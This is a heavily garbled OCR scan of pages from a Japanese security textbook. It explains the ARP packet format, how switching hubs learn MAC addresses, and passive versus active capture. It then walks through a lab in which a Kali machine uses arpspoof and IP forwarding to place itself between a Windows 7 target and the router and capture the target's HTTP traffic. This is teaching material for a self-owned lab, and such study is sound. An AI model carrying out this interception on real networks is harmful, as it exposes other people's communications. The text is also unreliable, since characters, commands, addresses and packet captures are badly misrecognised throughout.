ARP テ ー ブ ル は arp コ マン ド で 確認 で きま す 。Windows の 場合 は arp -a コ マン 
ド 、Linux の 場合 は arp コマ ンド を 入力 し ます 。 


Mindows の 場合 (コマ ンド プロ ンプ ト ) 
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Linux の 場合 





僅 ARP パケ ッ ト の フォ ー マ ッ ト 

ARP パ ケッ ト の フォ ー マ ッ ト は 、 次 の よう に な っ て いま す ( 図 6-40) ( 表 6-8)。 
た だ し 、ARP 要 求 を 送信 する 側 を 端末 A、ARP 応 答 を 送信 する 側 を 端末 B と し ま 
す 。 
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移 先 送信 元 
呈 還 昌 昌 EE 昌 間 間 


14 バ イト 


ハー ド | プロ ト | ハー ド プ 。 | 送信 元 送信 元 宛先 宛先 * デ ノム 
ウェ ア | コル | ウェ ア | フ ロト SM ハー ドウ ェ ア | プロ トコ ル | ハー ドウ ェ ア | プロ トコ ル [テイ る 
タイ プ | タイ プ | 長 | コル 長 | ショ ン | アド レス | アド レス | アド レス | アド レス | テ 


| | に 細 季 | : 下 | 
6 バイ ト 4 バイト 6 バイ ト 4 バイ ト 


28 バ イト 





図 6.40 ARP パ ケッ ト の フォ ー マ ッ ト 


表 6-8 ARP パ ケッ ト の 構成 要素 


宛先 MAC アド レス FF:FF:FF:FF:FF:FF 固 定 。 | 端末 A の MAC ア ドレ ス 。 


に レ 端末 A の MAC ア ドレ ス 。 端末 B の MAC ア ドレ ス 。 





MAC ア ドレ ス の 暴き を の で 、 6 周 
避 ア ドレ ス の 長き な の で 、4 還 


ES 2 バイ ト ここ で ARP リ クエ スト か ARP リプ ライ か を 識別 する 。 
cd 1 固 定 。 


送信 元 MAC ア ドレ ス 。 
送信 元 ハ ー ド ウェ ア | 可変 長 MAC ア ドレ ス 以 外 の アド レス に も 対応 で きる よう に 可変 
(実質 6 バイ ト ) | 長 に な っ て いる 。 


端末 A の MAC ア ドレ ス 。 端末 B の MAC ア ドレ ス 。 


*20 : ARP パ ケッ ト の サイ ズ は 28 バ イト し か な く 、46 バ イト に は 満た な い の で 意味 の な い デ ー タ 
( パ デ ィ ン グ デー タ と いう ) を 付加 し て 46 バ イト に し て いま す 。 





470 | 第 2 部 | ハッ キン グ を 体験 する 


送信 元 プ ロト コル ア | 可変 長 IP アド レス 以外 の アド レス に も 対応 で きる よう に 可変 長 
ドレ ス (実質 4 バイ ト ) | に な っ て いる 。 


端末 A の IP アド レス 。 端末 B の IP アド レス 。 
MAC ア ドレ ス 。 
宛先 ハー ドウ ェ ア ア | 可変 長 本 


ok 6 バイ ト ) | 不明 で ある た め 、 
( 実 | oo.oorooroo:oo:oo (基本) 。 | 鞭 本 A の MAC ア ドレ ス 。 


宛先 IP アド レス 。 


宛先 プロ トコ ル ア ド | 可変 長 端末 B の IP アド レス 。 
レス 4 バイ ト ) | この 部 分 を 見 て 、 各 端末 は 自 - 
実 抽 1 分 の MAC ア ドレ ス を 聞か れ て 端末 A の IP アド レス 。 
いる か を 判断 する 。 


Wireshark で パケ ッ ト キ ャ プチ ャ する と ARP 要 求 と ARP 応 答 は 頻 筐 に や り 取 
りさ れ て いま す 。 表示 フィ ル タ に |arp」 を 入力 し て 、ARP パ ケッ ト に 絞り こみ 、 
その 内 容 と 上 記 の 表 を 照ら し 合わ せ て みる と よい で し ょ う ( 図 6-41) 。 
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BB 12.24293 昌 IntelCor 21 :f9:a9 Broadcas そ を 

81 12.247185 HonHaiPr_c8:94:cc IntelCor 21:f9: ad 
S5 13.1 る 8794 Tnte1 て or _21: そ で 9:a9 BroadCaS て 

99 13.191917 MopcP1 at og: と 了 ア :b6 TntolCor 21 :f ぜ 9: っ 9 


SS$ る 8$ る る る 8 る $ を 


> Frame 5: 42 bytes on wtre (336 blts), 42 bytes captured (336 bl1ts) on interface 9 
っ Ethennet iT。 Src: Inte1Cor 21:f9:a6 (8c :79: 5a: 2 :f9:a9) 。 Dst: Brosdcast (ff:f: 人 ff: ff すず : イ サイ f) 
b est1nat1on: BPoadCas そ を (生生 : 邊 すす : 季 千 :f す :f] 
ト Sowrce: JntelCorn_21: 人 9:a9 (8<:76:5a:21:f9:a6) 
Type: AP (OxBB66 ) 
> Addres s Resolut1on Protoco+ (request) 


NOO ff 竹生 f 作 他人 伯 Bcc790 5a2119 
HH 98 98969480691 8c79 5a21+9 
0O40 9996@090909960c9 as8 9163 


9 プ areh=k Fcres 6DSA00-6 け SB-4A3(-BEDB-E 7 日 MF3BAE1E 21191029192700 33196 | Packets 793.0cPled 21 (3 alle 叶 AH 





図 6.41 ARP パ ケッ ト の 表示 
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@ ルー ター を 経由 する パケ ッ ト 転 送 

宛先 端末 が ルー ター を また い だ 別 ネッ トワ ー ク ( 例 : WAN 側 ) に 存在 する 状況 
を 考え ます 。 

Ethernet フ レー ム は ルー ター を 超え られ ませ ん 。 さ ら に 、ARP 要 求 で の プロ ー 
ドキ ャ スト 通信 は 、 ル ー タ ー を 超え られ ませ ん 。 そこで 、 端 末 か ら 見 て デフ ォ ル 
トゲ ー ト ウェ イ (ルー ター な ど 。 以降 、GW と 略す ) の IP アド レス は 既知 な の で 、 
ARP を 使っ て GW の MAC ア ドレ ス を 調べ ます 。 端末 は ルー ター に Ethernet フ 
レー ム を 送り ます 。 ル ー タ ー は Ethernet フ レー ム か ら IP パ ケッ ト を 取り 出し ます 
が 、 そ の IP ヘッ ダー に 書か れ た 宛先 IP アド レス が ルー ター 自身 の も の で は な い の 
で 、 そ の 宛先 [DP アド レス に 対し て パケ ッ ト を 転送 し ます 。 そ の 際 、Ethernet ヘ ッ 
ダー を 付け て 、Ethernet フ レー ム と し て 送信 する 必要 が ある の で 、 ル ー タ ー は 
ARP を 使っ て 宛先 IP アド レス か ら MAC ア ドレ ス を 調べ ます ( 図 6-42)。 











ー 
192.168.1.1 | 10.0.0.1 
BB'BB:BB:BB:BB:BB CCICCICCCC: 


192.168.1.100 
AA-AALAA-AA-AA-AA 
GW:192.168.1.1 


送信 元 MAC ア ドレ ス | AA:AAAA:AAAAAA 
192.168.1.100 
































Ehamat| 玩 MAC ア ドレ ス | DD:DD:DDDDDD:DD 
送信 元 MAC ア ドレ ス | cc:cc:cCCCCCCC 

宛先 PP アドレス 10002 

ヘッ ダー | % 信 知 P ア ドレ ス | 1921681100 





Ethernet 
』 ヘッ ダー 


















図 6-.42 ルー ター を 経由 する パケ ッ ト 転 送 


以上 の よう に 、IP パ ケッ ト の 送信 は 、ARP を 使っ て MAC ア ドレ ス を 調べ な が 
ら 、IP パ ケッ ト を 転送 し て いき ます 。 
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誠 スイ ッ チ ング ハブ の 学習 機能 

スイ ッ チ ング ハブ は 通信 を 効率 化す る た め に 、 物理 ポー ト ("21) と MAC ア ドレ 
ス の 対応 表 を 活用 し ます 。 こ の 対応 表 を MAC アドレス テー ブル (MAC テ ー プ ブル 
と 呂 す ) と 呼び ます ("22)。 

例え ば 、 図 6.43 の よう に 端末 AD が あり 、 そ れ ぞ れ が ボー ト 1]--4 に つなが っ 
て いる も の と し ます 。 こ の と き 、 端 末 A か ら 「 送 信 元 MAC ア ドレ ス は AA:AA: 
AA:AA:AA:AA、 宛先 MAC ア ドレ ス は BB:BB:BB:BB:BB:BB」 と いう Ethernet フ 
レー ム が 送ら れ て きた と し ます 。 す る と 、 ス イッ チン グ ハ ブ は Ethernet フレ ー ム 
の 送信 元 MAC ア ドレ ス を 参照 し て 、MAC ア ドレ ス AA:AA:AA:AA:AA:AA は 
ボー ト 1 に つなが っ て いる と 判断 し て 、MAC テ ー ブ ル に | ポート 1 人 @AA:AA:AA: 
AA:AA:AA| を 追記 し ます 。 

傘 に 、 こ の Ethernet フレ ー ム を 送信 する た め に MAC テ ー ブ ル を 参照 し ます が 、 
送信 先 MAC ア ドレ ス BB:BB:BB:BB:BB:BB に つい て は 記録 され て いま せん 。 そ の 
た め 、 残 り の ボー ト B~-C に その Ethernet フ レー ム を 送信 し ます 。 こ れ を フラ ッ 
ディ ング と いい ます 。 そ の 結果 、 端 末 B は 自分 宛 で ある の で 受け 取り 、 そ れ 以 外 の 
端末 は 自分 宛 で な い の で 破棄 し ます 。 こ の 時 点 で MAC ア ドレ ステ ー ブ ル に は 
「 ポ ー ト 1 ら AA:AA:AA:AA:AA:AA| と いう 1 レコ ー ド が 記載 され て いま す 。 

同様 に 、 端 末 B--D で も 通信 が 行わ れれ ば 、 い ずれ ん MAC テーブル に は 全 端 末 に 
つい て の レコ ー ド 、 す な わ ち 4 レコ ー ド が 記載 され ます ( 図 643)。 こ の よう に 、 ス 
イッ チン グ ハ プ は 学習 し な が ら 、MAC テ ー ブ ル を 更新 し 続け ます 。 た だ し 、MAC 
テー ブル は レコ ー ド を ずっ と 保持 し 続け る わけ で は あり ませ ん 。 例え ば 、 端 末 A 
と B を 入れ 共 え た り 、 別 の 端末 式 が つなが っ た りす る こと も あり ます 。 その た め 定 
期 的 に クリ ア さ れ ま す 。 


21 : ポー ト 番 号 の こと で は な く 、 物 理 的 な 接続 ポー ト の こと を 指し て いま す 。 

22 : Cisco の ネッ トワ ー ク 機器 で は 、MAC ア ドレ ステ ー プ ル を CAM (Content Addressable 
Memory) テー ブル と 呼び ます 。 CAM は 、 テー ブル か ら 目 的 の 行 を 高速 に 見 つけ る た め の 手 段 の 
を で ま 。 
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MAC ア ドレ ス 





AA AA AA | 
EC ココ 


| 姜 | CCCCCCCCICC:CC 


DD:DD:DD:DD:DD:DD 









端末 AA 端末 B 端末 C 端末 D 
AAAAIAAAAAAAA BB:BB:BB:BB:BB-BB CC:CCCCC-CC-CCCC DD:DD:DD:DD:DD:DD 


図 6.43 スイ ッ チ ング ハブ の 学習 機能 


光 キャ プチ ャ の アプ ロー チ 
人 パッ シブ キャ プチ ャ 

ある 程度 通信 が 行わ れ た 環境 で あれ ば 、 ス イッ チン グ ハ ブ に は ほぼ 完成 され た 
対応 表 が 存在 し ます 。 つ まり 、 パ ケッ ト が 本 来 の 宛先 に し か 送信 され ず 、 自 分 宛 
以外 の パケ ッ ト は 流れ て きま せん 。 当然 な が ら 到 達し な い パ ケッ ト は キャ プチ ャ 
で きま せん 。 

こう し た 状況 で キャ プチ ャ を 実現 する 最も 素朴 的 な アプ ロー チ は 、 そ の 通信 端 
末 上 で キャ プチ ャ する と いう 方 法 で す 。 端的 に いえ ば 、 通 信 元 ある い は 通信 先 の 
端末 で キャ プチ ャ する と いう こと で す 。 

また 、 ネ ットワーク 機器 (スイ ッ チ ング ハブ プ を 含む ) に よっ て は 、 ボー トミ ラー 
リン グ 機 能 を 備 と を て いま す 。 ポ ボー トミ ラー リン グ 機 能 は 、 あ る 接続 ボー ト の 通信 
を コピ ビー し て 、 別 の 接続 ポー ト に 送信 する 機能 で す 。 つ まり 、 そ の 接続 ポー ト に 
Wireshark を 起動 し た 端末 を 接続 し て お け ば 、 キ ャ プチ ャ で きま す ( 図 6-44) 。 攻 
撃 を 検知 する こと を 目的 と する の で あれ ば 、TIDS (侵入 検知 シス テム ) を 起動 し た 
端末 を 接続 する こと も あり ます 。 
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ター ゲッ ト 端 末 パケ ッ ト キ ャ プチ ャ する 端末 





図 6.44 ポー トミ ラー リン グ 


現在 は 家庭 用 の スイ ッ チ ング ハブ で も ボー トミ ラー リン グ 機 能 を 備え た も の が 
販売 され て いま す 。 例え ば 、NETGEAR の GS105E-200TPS は 、 4 ボート だ け を 持つ 
小型 の スイ ッ チ ング ハブ で す が 、 ポ ボー トミ ラー リン グ 機 能 や VLAN 機 能 を 備え て 
いま す ( 図 6-45)。 実 売価 格 は 3.500 円 程度 で す 。 


NETGEAR 


GS105Ev2ー5Port Gigabit ProSAFE Plus Swntch 





図 6.45 ポー トミ ラー リン グ 機 能 の 設定 画面 の 例 


以上 の よう に 、 監 視 対象 の 端末 を 積極 的 に 攻撃 せ ず に パケ ッ ト キ ャ プチ ャ する 
こと を 、 パ ッ シ ブ キャ プチ ャ (受動 的 キャ プチ ャ ) と いい ます 。 パ ッ シ プ キャ プ 
チャ の 特徴 は せ 、 キャプチャ の た め に 通信 を 増加 させ な いこ と で す 。 
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@ アク ティ ブフ キャ プチ ャ 

ネッ トワ ー ク の トラ ブル シュ ー テ ィング を 主 目的 と する の で あれ ば 、 パ ッ シ プ 
キヤ プチ ャ で も 十分 で す 。 し か し 、 攻 松 者 の 立 短 か ら す る と 、 こ うし た アプ ロー 
チ を 選択 で きる 場面 は ほとん ど あ り ま せん 。 例え ば 、 通 信 端 末 に キャ プチ ャ ソフ 
ト を イン スト ー ル で きる と いう こと は 、 す で に 侵入 済み と いう こと で す 。 キャプ 
チャ ソフ ト は 一 般 に 管理 者 権限 が 必要 で ある た め 、 管 理 者 権限 も 得 て い る 状況 と 
な り ま す 。 そ の 状況 で わざ わざ パケ ッ ト キ ャ プチ ャ し て も 、 得 られ る 情報 は 少な 
いで し ょ う 。 パ スワ ー ド を 奪う と いう 目的 で あれ ば 、 キ ー ロ ガー で も 代替 で きま 
す 。 

よっ て 、 攻 撃 者 は まっ た く 別 の アプ ロー チ を 採用 し ます 。 特 に 、ARP ス プー 
フィ ング を 併用 し て パケ ッ ト キ ャ プチ ャ する アプ ロー チ が よく 採用 され ます 。 本 
書 で は これ に つい て 次 項 で 解説 し ます 。 

以上 の よう に 、 監 視 対象 の ネッ トワ ー ク に 人 為 的 な 通信 を 作り 出し た り 、 介 入 
し た りす る こと で パケ ッ ト キ ャ プチ ャ する こと を 、 ア クティ イブキ ャ プチ ャ (能動 
的 キャ プチ ャ ) と いい ます 。 パ ッ シ ブ キャ プチ ャ は 、 キ ャ プチ ャ する 場所 を 工夫 
する こと で 実現 する た め 、 技 術 的 に は 比較 的 わか りや すい と いえ ます 。 一 方 、 ア 
クティ プ キ ャ プチ ャ は プロ トコ ル や アプ リケーション の 脆 層 性 を 利用 する た め 、 
複雑 な 状況 と いえ ます 。 そ の た め 、 和 完全 に うま くい く と は 言い 切れ ませ ん 。 


光 ARP スプ ー フ ィング 


ARP ス プー フィ ング と は 、ARP の 仕様 を 悪用 し て 、 タ ー ゲ ッ ト 端 末 の ARP テ ー 
ブル を 書き 換え る 攻撃 で す 。 ARP キ ャ ッシュ ボ イ ゾ ニン グ と も 呼ば れ ま す 。 また 、 
ARP テ ー ブ ル を 書き 換え られ る こと を 「ARP テ ー ブ ル が 汚染 され た 」 と 表現 し ま 
す 。 

ARP ス プー フィ ング に より 、 パ ケッ ト ( 茂 客 に は Ethernet フレ ー ム ) を 意図 し 
た 端末 に 送信 で きま す 。 そ の た だ ため 、 一 般 に アク ティ プ キ ャ プチ ャ を 実現 する た め 
に 用 いら れ ま す 。 


免 ARP スプ ー フ ィング の 原理 
ARP は 仕様 上 、 次 の よう な 特徴 を 持っ て いま し た 。 
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s ARP 有 要求 と ARP 応 答 は 賠 黙 に 信頼 きれ て いる 。 言い 換え れ ば 、 認 証 が な い 。 
s クラ イア ント は 、ARP 要 求 を 送っ て いな くも 、ARP 応 答 を 受け 入れ る 。 


こう し た 仕様 に みな っ て いる の は 、 メ モリ ー の 容量 を 削減 し て 、 プ ロト コル を 単 
純化 する た めで す 。 

ARP 要 求 を 送信 し て いな い に も か か わら ず ARP 応 答 を 受信 する と 、 そ れ を 受け 
付け て し まい ます 。 つ まり 、ARP 応 答 に 偽 の MAC ア ドレ ス を 書き 込ん で お く と 、 
受信 側 は それ を 信用 し て ARP テ ー ブ ル を 上 書き し て し まう わけ で す 。 


@ ARP スプ ー フ ィング で アク ティ フキ ャ プチ ャ を 実現 で きる 理由 


ARP ス プー フィ ング に よっ て 、 通 信 を 横取り で きる こと を 説明 し まし た 。 し か 
し 、 単 に 横取り し た だ け で は 、 正常 な 通信 が 保 た れ ま せん 。 例え ば 、 イ ンタ ー ネ ッ 
ト に アク セス し て Web ペ ー ジ を 開い た の に 、 そ れ が 表示 され な けれ ば 上 異常 に 気付 
か れ て し まい ます 。 

そこ で 、 次 に 示す 3 段階 で 攻撃 し ます 。 


1. ター ゲッ ト 端 末 に 対し て ARP ス プー フィ ング し て 、 ル ー タ ー に 届く べき パ 
ケッ ト を 攻撃 端末 に 届く よう に する 。 

2 ルー ター に 対し て ARP ス プー フィ ング し て 、 タ ー ゲ ッ ト 端 末 に 届く べき パ 
ケッ ト を 攻撃 端末 に 届く よう に する 。 

3. 攻撃 端末 は 、 タ ー ゲ ッ ト 端 末 や ルー ター か ら 届 いた パケ ッ ト を 転送 する 。 


これ に より 、 タ ー ゲ ッ ト 端 末 と ルー ター の 間 に 攻 撃 端末 が 割り 込ん だ 状況 に な 
り 、 通 信 も 正常 に や り 取 りさ れ ま す 。 例え ば 、 タ ー ゲ ッ ト 端 末 が 、 イ ンタ ー ネ ッ 
ト の Web ペ ー ジ を 開け ば 、 通 常 通り 表示 され ます 。 し か し 実際 に は 、 攻 撃 端末 が 
代わ り に ルー ター に HTTP 要 求 を 送り 、 届 いた HTTP 応 答 を ター ゲッ ト 上 端末 に 返 
し て いま す 。 ターゲット 端末 に 気付 か れる こと な く 、 届 いた パケ ッ ト を キャ プ 
チャ で きま す ( 図 6-46) ( 図 6-47)。 

この よう に 、 両 者 に 気付 か れず に 間 に 入 り 込 む 攻 撃 を 中 間 者 攻撃 (MITM 
attack : Man-In-The-Middle attack) と いい ます 。 
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スイ ッ チ ング ハブ 


3589885g 
本 





ター ゲッ ト 端 末 
192.168.1.10 
AA-AA-AA-AA-AA-AA 











攻撃 端末 
192.168.1.11 
BB:BB:BB:BB:BB:BB 


図 6.46 アク ティ ブ キ ャ プ チャ 前 


ター ゲッ ト 上 端末 
192.168.1.10 


192.168.1.11 
BB:BB:BB:BB:BB:BB 


図 6-47 アク ティ ブ キ ャ プ チャ の 準備 


図 648 は イン ター ネッ ト に HTTP 要 求 を 送信 し た と き の 動 作 に な り ま す 。 
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HTTP 応 答 の と き は 通信 の 向き が 逆 に な り ま す が 、 ル ー タ ー の ARP テ ー ブ ル は 汚 
染 さ れ て いる の で 同様 の 動き に な り ま す 。 





スイ ッ チ ング ハブ 
| 
/m 5 yh se で ちこ 
ター ゲッ ト 映 末 ポー ト う 192.168.1.1 
192.168.1.10 CCOCSCOC2XCCAEEXCOC2 








192.168.1.11 
BB:BB:BB:BB:BB:BB 


図 6.48 アク ティ ブ キ ャ プ チャ 


沙 arpbspoof に よる アフ ティブ キャプ チャ 

Kali に は arpspoof が イン スト ー ル され て お り 、 こ れ を 用 いる こと で ARP ス プー 
フィ ング を 実現 で きま す 。 つ まり 、arpspoof を 2 回 実行 し て 、 Kali で IP 転送 機能 を 
有効 に すれ ば 、 ア クティ プ キ ャ プチ ャ を 実現 で きま す 。 

実験 の ネッ トワ ー ク 構成 は 、 図 649 の よう に し ます 。 
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192.168.1.1 





192.168.1.20 


Windows 10 
(ホス ト OS) 


192.168.1.21 


Windows 7 
(ター ゲッ ト 上 端末 ) 









図 6.49 アク ティ ブ キ ャ プ チャ の 実験 の ネッ トワ ー ク 構成 


① 仮 想 LAN アダ プター を 設定 する 

Kali の 仮想 マシ ン を 終了 し て お き 、 仮 想 マ シン の 設定 画面 を 表示 し ます 。 設定 画 
面 の 左 ペ イン で 「 ネ ットワーク 」 を 選び 、 次 の よう に 仮想 LAN ア ダ プ ター を 設定 
し ます ( 図 650)。 た だ し 、 ア ダ プ ター1 以外 は 無効 に し ます 。 


割り 当て : ブリ ッ ジ アダ プター 


名 前 : 有線 LAN の ドラ イ バ ー 名 
高度 : 
プロ ミス キャ スモ ー ド : すべ て 許可 
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[9 Kei-Unux-301& 3 (54b6).man - 師 定 





ー ネッ トワ りー 

ツ ス テム アダ フタ ー| アウ み フ NRー2 了 了 の づめ ー3 アプ ウー 4 
回 スチル ィ 

較 2 ルル -? 

販 カテ バ 


部 ネッ トワ ー ク 「 アオ コロ ー タ イイ CT IEiel PHOZIO0 MT DesKipp 935HOEND 


Pe 
人 後 ソリ アル 項 ト ブロ ミス 2N※ ゃ スモ ー ド Py | 和 き XL 放 本 

MACPFL2(MX 000W272F654 

必 USB ーー- 還 
ター ブル 掲 錠 G] 








上 証 ド フ ォ ルプ ダー 
ユー ザー イン ター フェ ー ス 





Yo | 
6-50 arpspoof の 準備 


②)Kali の 仮想 マシ ン を 起動 する 


Kali の 仮想 マシ ン を 起動 し ます 。 起動 し た ら 、 LAN 内 の IP アド レス で ある こと 
を 確認 し ます 。 


Poot 細 ka11:<# ュ 和 Tconfig eth9 
eth9: flags=4163<UP , BROADCAST , RUNNTNG ,MULTTCAST> mtu 1599 


inet 192.168.1.4 netmask 255.255.255.9 broadcast 。」 


192.168.1.255 
( 略 ) 


# p1ng -c 4 192.168.1.1 ルー ター へ の 践 通 確認 。 
# phng -c 4 8.8.8.8 イン ター ネッ ト へ の 疎通 確認 。 





3③ タ ー ゲ ッ ト 端 末 の ARP テー ブル を 確認 する 
ター ゲッ ト 端 末 (Windows 7) の ARP テ ー ブ ル を 確認 し ます 。 コ マン ド プ ロン 


プ ト で 次 を 実行 し て 、 ル ー タ ー の IP アド レス 192.168.1.1 に 対応 する MAC アド レ 
ス を 確認 し ます 。 
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④Kali で MAC アド レス と IP アド レス を 確認 する 
Kaii に て 、MAC ア ドレ ス を 確認 し ます 。 





route コ マン ド で Gateway (ルー ター) の IP アド レス を 確認 し ます 。 
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5)Kali の IP 転送 機能 を 有効 に する 
Kali で 次 の よう に 入力 し て 、 IP 転送 機能 (23) を 有効 に し ます 。 





⑥ ター ゲッ ト 端 末 で キャ プチ ャ を 開始 する 
ター ゲッ ト 端 末 (Windows 7) に て 、 Wireshark を 起動 し て キャ プチ ャ を 開始 し 
て お きま す 。 


⑦ タ ー ゲ ッ ト 上 端末 に 偽 の 情報 を 送る 

Kalii に て 、 タ ー ゲ ッ ト 上 端末 に 偽 の 情報 を 送り ます 。 次 の 書式 で arpspoof を 実行 
する と 、+t オ プシ ョ ン で 指定 し た 端末 に 偽 の ARP 応 答 が 送ら れ ま す 。 そ の 内 容 は 、 
「arpspoof を 実行 し た 端末 の MAC ア ドレ ス 必 arpspoof で 指定 し た IP アド レス 」 と 
な っ て いま す 。 





ここ で は 、 次 の よう に 入力 し まし た 。 こ れ に より 、 タ ー ゲ ッ ト 上 端末 (Windows 
7、192.168.1.21) の ARP テ ー ブ ル に お いて 、 ル ー タ ー (192.168.1.1) の レコ ー ド が 
書き 換わり ます 。 





*23 : IP フォ リード 和 機能 と も 呼び ます 。 IP パケ ッ ト を 転送 する 機能 で す 。 "/proc/sys/net/jpv4/jp_ 
forward'" ファ イル に 1 を 設定 する と 有効 に な り 、0 を 設定 する と 無効 に な り ま す 。 
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⑧) ターゲット 端末 の ARP テー ブル を 確認 する 
ター ゲ ダット 端 末 (Windows 7) で 再び ARP テ ー ブ ル を 確認 し ます 。 


C:\Users\1DuS1ron>arD -a 


イン ター フェ ー ス : 192.168.1.21 --- 9@xd 
イン ター ネッ ト アド レス 物理 アド レス 種類 
192 .168 .1.1 98-99- 27-2f-85-44 動 的 MAC ア ドレ ス が 変わ っ た 。 
( 略 ) 





も と も と 、192.168.1.1 の MAC ア ドレ ス は 10:66:82:e4:c7D6 で し た が 、08.:00:27:2f 
85:44 に 変わ り ま し た 。 これ は Kaii の MAC ア ドレ ス で す 。 これ で 第 1 段階 は 終わ り 
で す 。 

Wireshark の 表示 フィ ル タ に 「arp」 と 指定 し て 、 表 示 を 見 や すく し ます ( 図 
6-51 ) 。 偽 の 情報 を 含む ARP 応 答 が 届い て いる こと が わか り ま す 。 


SI の も.】 - 
_ 4 っ し 


ビア 和 に に - 角 向 まり リリ い 9 の は P ア 4F34 り :n り 0 アイル 4F: に XY 「. = 
人 15 生き 中 
1 隔 昌一 一 _ ニーーーーー ド ーー ニー ニー ニーーー ーー ーー ーー ーーーーーー ーー ーーーーーー ーーーー ーーーーーーー ーーーーーーーー ーー * 
Ip Te mfre Lmrinmhnn hotncci や = 

1541 713.30353》 CaqwusCo 2f:85:44 W3stroni eo3:9b:96 ARP Mno has 192.36B.1.3】 す Te1】 192.1|.1.4 

1S42 21.39155S 。 Mistroni _e]:9b:96 Cadmusro 2f:S:44 ARP 192.168.1.21 1s at fB:de.f3:e3:9H| 96 

1583 75-946413 CaqmusCo_2f:85:44 istroni_e3:9b:96 | ANP 192.168.1.1 3s at 98:90:27:2f:85:44 | 

1611 77.847373 CadmwusCo 2f:85:44 Wstroni ce3:9b:96 | ANP 192.168.1.1 3s at 9B:00:27:2f - き 5 :44 

1650 79.94596⑳ CagmusCo 2f:85:44 WistronT c3:9b:96 | ANP 192.163 ,1 。1 is st ⑳6:90:27:2f:85 44 


: Framc 1583: 69 bytes on wirc (4353 bits)。 59 bytes captured (4 bits) on interface ゆ 
2 Etiherrwet LT。 SrC: て admustO_2f: 685:94 (09 0 2772T [89149)。 Dst: Wistronl_e3:9b:96 (fO: de if1 ie3: 9D:36 ) 
Destimat3Qon : is て roni oe3:9D!96 (人 f:de:f1:o ヨ :9b : 36 ) 
) Sounce: CadmacCo すす: SO:44 (9B.86: 27:3f : H5 : 44) 
ypo: ANP (dd6 ) 
Pandirngz - HKTHKWNKKIHKKERWKHOWNOCKYHEWNIEWTHK 丈 所 


Hardwarc tyjpe: に thermet (11 








Prot0<ol type: IPvq (hcW50 ) 

Hardwere Sizei 6 

Protoco1 sizoi 4 

Opcode: roPly (2) 

Sandgr MC っ ddrgss- CadmmiscrO メ f:85-44 (BB-89-J ナ - ュ f 8S-34) 
Scndcr 』P aGdre55: 192.16 け 。1.1 

Target MMC addres > - MistronT_<3:9b: 人 6 (f 介 de f- で う 3: 9b:96) 
TarWet 】P auGdre5S: 192、168。1 21 











amhat cre tfS94Ef-4932ーW モ 6- AA 昌 - SCSTEIES)41 3I19NI2182544 ati203 | Petz EE3) Damimyet 190(8200 .OworPmi 9(OOW| PRrcfie WaN 





図 6-51 偽 の 情報 が 送ら れ て いる 
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⑨) ルーター に 偽 の 情報 を 送る 
別 Terminal を 起動 し て 、 ル ー タ ー に 偽 の 情報 を 送り ます 。 


Poot 個 ka11:<# arpspoof - ュ 1 eth9 -† 192.168.1.1 192.168.1.21 
8:9:27:2f†:85:44 19:66:82:e4:c7:b6 9896 42: arp reply 192.168.1.21 
1s-at 8:O:27:2f:85:44 

(出力 され 続け る ) 


3⑩ 通 信 を キャ プチ ャ する 
これ で 、 タ ー ゲ ッ ト 端 末 と ルー ター 聞 で や り 取 り し て いる デー タ は Kali を 通過 
し ます 。 Kali 上 の Wireshark で その 通信 を キャ プチ ャ で きま す 。 


Poot 引 ka11:<-# wireshark & 


ター ゲッ ト 端 末 で イン ター ネッ ト に アク セス する と 、 そ の HTTP 通 信 が キャ プ 
チャ され まし た 。 送信 元 IP ア ドレ ス が 192.168.1.21 の パケ ッ ト は 、 タ ー ゲ ッ ト 端 末 
の HTTP 要 求 で す ( 図 6-52) ( 図 6-53) 。 


ーーー ら 6 @ 9 の 
FNG Edt View Go て Capture Anayze Statstcs Telephonr Wireless Teols Help 
l 本 ざさ @⑤ 5 円 妥 A** oea 還 証 &&e& 玩 





No、 Timw SOU「Ce Destinabon 
37 了 7 ナ 34, 13Z116074 192.1316 は 8.1。Z1 59.1BO.1394.16 1279 5ET /cntry/jnmmgc/httD ://akadeT 
37H1 49 、172 昌 79B53 359.196.1943.16 1 97 10H 、 1 、 了 1 3 了 う 5 HTTP/1 1 302 『 ず pund3 
5882 5$5.39516419G | 192 . 16#. 1. ブ 1 5 る 9 1HG6 。 19 、 299 581 GET /1ndGX.DhD7FTOTLPaqg HTTP。 


Length Info = 















55H4 55 .48Z790325 59.196.19.200 39Z . 16 ピ H . 1 .21 
5511 55.591123426 192.168.1.21 っ 9 . 1B6 - 19 . 289 
5519 55.53100995917 192.368. 1 .21 59 . 106 . 19 . 200 


6979 Cont1nuat1on 
499 BET /skin/pukiwiki_ns2.css .PI 
511 GET /skin/pukiwiki ns2.css.Pli 










5991 59 632772279 959.196.19.20G 
GBB9 6⑥1 7243B2489 192.16#.1.21 
530/ 55 .22605HUG9 54.238.099.22 


392Z .10H . 1 .Z1 3581 HTTP/1 .1 2Z299 OK (tcxt/ て SS ) 
54 218 .99 .22 665 POST /cg1-bin-DY/nlObalweathei 


II ル 4Z が ET 多 人 W】 "ーー う っ . 
! Frame 1573: 4BB bytes on wire (3849 bits) LULZA シ レル 4 計 は だ 


。 Ethernet IL, Src: MistronI_c3:9b:96 (f@:de:f1:c3:9b:96), Dst: PcsCompu_2f:B5:44 (98:99:27:2f:B5 :44} 
5 TnLe で rm で t PFOtoCO』 Version 4。 Src: 192Z.366.1.Z1。 Dst: 99.1p0 .19 .299 

) TFANSTASS1OT COHt「O」 PfOt0CO1。 S「C POTt: 44037。 Dst POTt: BB, S@: 
* 


474。 Acki 17423。 し Len: 420 








on em F3 
ロア Hpertext Trmnsfer Protocol: Protncol Packets: 6452 Diplmved: 67 (1.0 Profile: Default 





図 6-52 中 継 し た 通信 の キャ プチ ャ 
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192.168.1.1 









スイ ッ チ ング 
人 
192.168.1.21 192.168.1 


Windows 7 Windows 10 
(ター ゲッ ト 上 端末 ) ( ホ 丸 ト OS) 


六 
192.168.1.4 


\、、 Mai 
(ゲス ト OS) 


この よう に 完全 に キャ プチ ャ で き て いま す が 、HTTPS の よう に 暗号 化 さ れ た 
デー タ の 中 身 ま で は わか り ま せん (暗号 化 さ れ た パケ ッ ト の まま キャ プチ ャ され 
る )。 









図 6.563 アク ティ プ ブ キャ プチ ャ の 実験 の 流れ 


⑪ arpspoof を 終了 する 

終了 時 は arpspoof の Terminal で [Ctrl] + [c] キー を 押し ます 。 す る と 、 正 常 
の 値 を 設定 し た ARP 応 答 が 送ら れ ま す 。 タ ー ゲ ッ ト 端 末 の ARP テ ー ブ ル を 確認 
する と 、 正 常 の MAC ア ドレ ス に 戻っ て いま す 。 


MR 


| 正常 の WAC アド レス に 戻っ た 





